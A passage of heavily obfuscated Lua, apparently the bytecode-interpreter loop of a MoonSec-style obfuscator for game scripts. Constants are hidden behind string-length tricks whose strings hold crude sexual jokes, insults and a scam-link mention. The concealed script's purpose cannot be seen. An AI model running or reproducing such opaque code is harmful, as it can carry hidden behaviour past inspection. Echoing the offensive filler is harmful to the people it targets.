_l_;__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];if __[_[_l__]]then _l=_l+_ll;else _l=_[__ll];end;break end;break;end break;end while 2362==(_l_)/((-#[[Before you marry someone make them use a computer with slow internet to see who they really are]]+(0xc90+-95)))do _l_=(1303116)while __l_l<=(0x5bbc/114)do _l_-= _l_ _l_=(7166848)while((-#"this challenge was brought to you by bmcq"+(-0x19+494))-0xdf)<__l_l do _l_-= _l_ local ___l;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];___l=__[_[__ll]];__[_l_+1]=___l;__[_l_]=___l[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=(_[_l_ll]~=0);break end while(_l_)/((438724/0x8f))==2336 do local _l=_[_l__]__[_l]=__[_l](_l_l(__,_l+_ll,_[_llll]))break end;break;end while 3844==(_l_)/(((((0x3c3+-72)+-#"psu more like psshit hahahaha laugh at my joke everyone")-0x1d8)+-#'1 plus 1 doesnt equal 111'))do _l_=(487060)while __l_l>(-#"Cannnn Iiiiiiiii put my ballzzzzzz in your jawwwwwww?"+(-0x6a+366))do _l_-= _l_ __[_[_ll_]]=__l_[_[____]];break end while 245==(_l_)/((0x810+((0x18-54)+-#'someone play roblox with mer please hes lonely')))do local _l=_[___];do return __[_l](_l_l(__,_l+1,_[__ll]))end;break end;break;end break;end break;end while 1329==(_l_)/(((0x77fac/132)+-#'moonsec pls add fivem choice'))do _l_=(9181890)while __l_l<=(-0x1b+(-24+0x107))do _l_-= _l_ _l_=(2201307)while(18900/0x5a)>=__l_l do _l_-= _l_ _l_=(10034154)while(-#'bite this onions'+(298+-0x49))<__l_l do _l_-= _l_ local _l=_[_l__];local _ll=__[_l];for _=_l+1,_[_llll]do _l_lll(_ll,__[_])end;break end while(_l_)/(((0x96090/248)+-#"mom shot dad"))==4069 do local _llll;local _l_;_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l];_llll=__[_[___ll]];__[_l_+1]=_llll;__[_l_]=_llll[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];break end;break;end while(_l_)/((180435/0x73))==1403 do _l_=(12757446)while __l_l>(0xc776/242)do _l_-= _l_ local _l=_[_lll]local _l_={__[_l](__[_l+1])};local __l=0;for _=_l,_[_lll_]do __l=__l+_ll;__[_]=_l_[__l];end break end while(_l_)/((0x1f4f-4037))==3207 do for _=_[_lll],_[____]do __[_]=nil;end;break end;break;end break;end while 2790==(_l_)/((358719/(240-0x83)))do _l_=(8241090)while __l_l<=(0xc976/241)do _l_-= _l_ _l_=(87075)while __l_l>(28542/0x86)do _l_-= _l_ local _ll=__[_[_l_l_]];if not _ll then _l=_l+_l__l;else __[_[_l__]]=_ll;_l=_[_l_ll];end;break end while(_l_)/(((0x27402/230)+-#"teefus more like pedofus"))==129 do local ___;local _l_;__[_[_l__]]();_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];___=__[_[__ll]];__[_l_+1]=___;__[_l_]=___[_[_lll_]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];if not __[_[_l__]]then _l=_l+_l__l;else _l=_[_l_ll];end;break end;break;end while 3842==(_l_)/(((0x1163-2281)+-#[[Federla is good at coding]]))do _l_=(1548066)while __l_l>(-59+0x112)do _l_-= _l_ local _=_[___l];____l=_+_ll_ll-1;for _l=_,____l do local _=__llll[_l-_];__[_l]=_;end;break end while 669==(_l_)/((513708/(320+-0x62)))do local _lll;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___];_lll=__[_[_l_ll]];__[_l_+1]=_lll;__[_l_]=_lll[__[_[__l__]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[____]~=0);break end;break;end break;end break;end break;end break;end while(_l_)/((-#'soonmec'+(0x4d166/150)))==2422 do _l_=(786393)while((0x105e8/232)+-#'Oh so you know C++? What does sizeof(int) equal to? (gcc)')>=__l_l do _l_-= _l_ _l_=(6525960)while(-#"i hate noobmaster"+(0x261-368))>=__l_l do _l_-= _l_ _l_=(7851634)while __l_l<=(-106+0x146)do _l_-= _l_ _l_=(308176)while __l_l<=((15291-0x1ded)/35)do _l_-= _l_ _l_=(1669356)while(0x8952/162)<__l_l do _l_-= _l_ local _l_;__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))break end while(_l_)/((-#'federal is an asshole'+(4566/0x2)))==738 do local _={__,_};_[_ll][_[_l___][_ll_l]]=_[_l___][_ll__]+_[_l___][_l_ll];break end;break;end while(_l_)/((-48+0xfe))==1496 do _l_=(697722)while __l_l>(0x12c+-81)do _l_-= _l_ local _l_ll;local _l_;_l_=_[_lll]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___];_l_ll=__[_[____]];__[_l_+1]=_l_ll;__[_l_]=_l_ll[__[_[_l_l_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[__lll]~=0);break end while 2258==(_l_)/((-#[[constant dumB]]+((1431-0x2db)-378)))do local __l_l;local _l_;_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];if __[_[_lll]]then _l=_l+_ll;else _l=_[___ll];end;break end;break;end break;end while 3262==(_l_)/((0x8ecc5/243))do _l_=(1002687)while __l_l<=(0x207-297)do _l_-= _l_ _l_=(7490256)while((1180-0x284)-315)<__l_l do _l_-= _l_ local _lll;local _l_;_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];_lll=__[_[__lll]];__[_l_+1]=_lll;__[_l_]=_lll[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[___ll]~=0);break end while(_l_)/((-68+0xe71))==2064 do __[_[___l]]();break end;break;end while 2793==(_l_)/((756-0x18d))do _l_=(1352690)while __l_l>((0x7bda-15873)/0x47)do _l_-= _l_ local _l_;_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];break end while 3706==(_l_)/((-#'free moonsec anywhere you go!'+(0x671e/67)))do local _l_;__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];if(__[_[___l]]==__[_[_l_l_]])then _l=_l+_l__l;else _l=_[____];end;break end;break;end break;end break;end while(_l_)/((-#'no icepool fans allowed kthx'+(7489-0xedd)))==1785 do _l_=(8280126)while(-#'Cannnn Iiiiiiiii put my ballzzzzzz in your jawwwwwww?'+(0x18f+-118))>=__l_l do _l_-= _l_ _l_=(10349353)while __l_l<=(574-0x15c)do _l_-= _l_ _l_=(2717195)while __l_l>(-#[[why cant i use localplayer on server scripts pls help im noob]]+(636-0x15e))do _l_-= _l_ local _l_;__[_[_lll]]=__[_[_llll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__ll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[____]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_llll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[____]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_llll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[__ll]]*__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]][_[__ll]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];_l=_[____];break end while 2459==(_l_)/((0x8e7-1174))do local _ll_;local _l_;_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll];_ll_=__[_[_llll]];__[_l_+1]=_ll_;__[_l_]=_ll_[__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[__lll]~=0);break end;break;end while(_l_)/((-#'certified hood classif'+(0x629d5/(-0x3f+214))))==3901 do _l_=(411879)while __l_l>(((-0x6e+490)+-0x66)+-#"someone play kogama with perth please hes so lonely")do _l_-= _l_ local _ll_;local __lll,_l__;local _l_;__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__lll,_l__=_lllll(__[_l_](_l_l(__,_l_+1,_[____])))____l=_l__+_l_-1 _ll_=0;for _=_l_,____l do _ll_=_ll_+_ll;__[_]=__lll[_ll_];end;_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,____l))_l=_l+_ll;_=__l[_l];if __[_[_lll]]then _l=_l+_ll;else _l=_[__ll];end;break end while 537==(_l_)/((0x66a-875))do local _lll;local ____,__ll;local _l_;__[_[_ll_]]=__[_[_l_ll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[___l]____,__ll=_lllll(__[_l_](__[_l_+_l__l]))____l=__ll+_l_-_ll _lll=0;for _=_l_,____l do _lll=_lll+_ll;__[_]=____[_lll];end;_l=_l+_ll;_=__l[_l];_l_=_[_l__];do return __[_l_](_l_l(__,_l_+1,____l))end;_l=_l+_ll;_=__l[_l];_l_=_[_ll_];do return _l_l(__,_l_,____l)end;break end;break;end break;end while 3114==(_l_)/(((0xaa3+-34)+-#'How did adam and eve populate?'))do _l_=(753755)while __l_l<=(345+-0x73)do _l_-= _l_ _l_=(6274532)while __l_l>((0x249-308)+-#'alt + f4 to open up the deobfuscated source code')do _l_-= _l_ local __ll;local _l_;_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll];__ll=__[_[____]];__[_l_+1]=__ll;__[_l_]=__ll[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))break end while(_l_)/(((-122+0xaff)+-97))==2417 do local __l_l;local _l_;__[_[_ll_l]]=_____[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__l_l=__[_[_l_ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[____]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[___]]=_____[_[_llll]];_l=_l+_ll;_=__l[_l];_l_=_[___l];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_llll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[_l_ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];do return end;break end;break;end while(_l_)/((0x96d9d/191))==233 do _l_=(2025858)while(556-0x145)<__l_l do _l_-= _l_ local _l_;local __l_l;local _l___,_____;local __l__;local _l_;__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]][_[___ll]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l__=__[_[___ll]];__[_l_+1]=__l__;__[_l_]=__l__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[___ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[___];__l__=__[_[_l_ll]];__[_l_+1]=__l__;__[_l_]=__l__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]_l___,_____=_lllll(__[_l_](__[_l_+_l__l]))____l=_____+_l_-_ll __l_l=0;for _=_l_,____l do __l_l=__l_l+_ll;__[_]=_l___[__l_l];end;_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_llll]][_[_lll_]];_l=_l+_ll;_=__l[_l];_l_=_[___];__l__=__[_[_llll]];__[_l_+1]=__l__;__[_l_]=__l__[_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]_l___,_____=_lllll(__[_l_](__[_l_+_l__l]))____l=_____+_l_-_ll __l_l=0;for _=_l_,____l do __l_l=__l_l+_ll;__[_]=_l___[__l_l];end;_l=_l+_ll;_=__l[_l];_l_=_[___l]_l___={__[_l_](_l_l(__,_l_+1,____l))};__l_l=0;for _=_l_,_[__ll_]do __l_l=__l_l+_ll;__[_]=_l___[__l_l];end _l=_l+_ll;_=__l[_l];_l=_[_l_ll];break end while 3343==(_l_)/((0x17d1e/161))do local _l_ll;local _l_;_l_=_[___l]__[_l_](_l_l(__,_l_+_l__l,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__];_l_ll=__[_[__lll]];__[_l_+1]=_l_ll;__[_l_]=_l_ll[__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];break end;break;end break;end break;end break;end while 261==(_l_)/((6138-0xc35))do _l_=(2841778)while(-#'paster haha paster'+((-43+0x2b81)/0x2b))>=__l_l do _l_-= _l_ _l_=(14972076)while(0x220-308)>=__l_l do _l_-= _l_ _l_=(7725138)while __l_l<=(-#[[guys why isnt localplayer working on server scripts please help i am noob]]+(0xa0b2/134))do _l_-= _l_ _l_=(2655900)while(-#'starmcommunity.ru/scamlink'+(0x12b+-40))<__l_l do _l_-= _l_ local _l_ll;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l];_l_ll=__[_[____]];__[_l_+1]=_l_ll;__[_l_]=_l_ll[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___l];_l_ll=__[_[_llll]];__[_l_+1]=_l_ll;__[_l_]=_l_ll[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];break end while 1362==(_l_)/((((0xd9805/223)+-#'sup v 2')-0x7f6))do local _=_[_l__];do return _l_l(__,_,____l)end;break end;break;end while(_l_)/((2055+-0x1d))==3813 do _l_=(3652980)while(-#[[Searching for the wrapper function]]+(0x7af1/117))<__l_l do _l_-= _l_ if(__[_[_ll_]]<=_[__l__])then _l=_[_llll];else _l=_l+_l__l;end;break end while(_l_)/((-#[[porn]]+(717948/0xfc)))==1284 do if(__[_[_ll_]]==__[_[_l_l_]])then _l=_l+_l__l;else _l=_[__ll];end;break end;break;end break;end while 4028==(_l_)/(((0x6ed4a/122)+-#'sexy'))do _l_=(10960718)while(-#[[give access to functions for boosters]]+(-79+0x162))>=__l_l do _l_-= _l_ _l_=(936120)while(-#'1 bobuk'+(-0x78+364))<__l_l do _l_-= _l_ local _l_;__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[____]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[_llll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]][__[_[_l_ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[_llll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[__lll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[____]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]][__[_[_l_ll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]][__[_[____]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l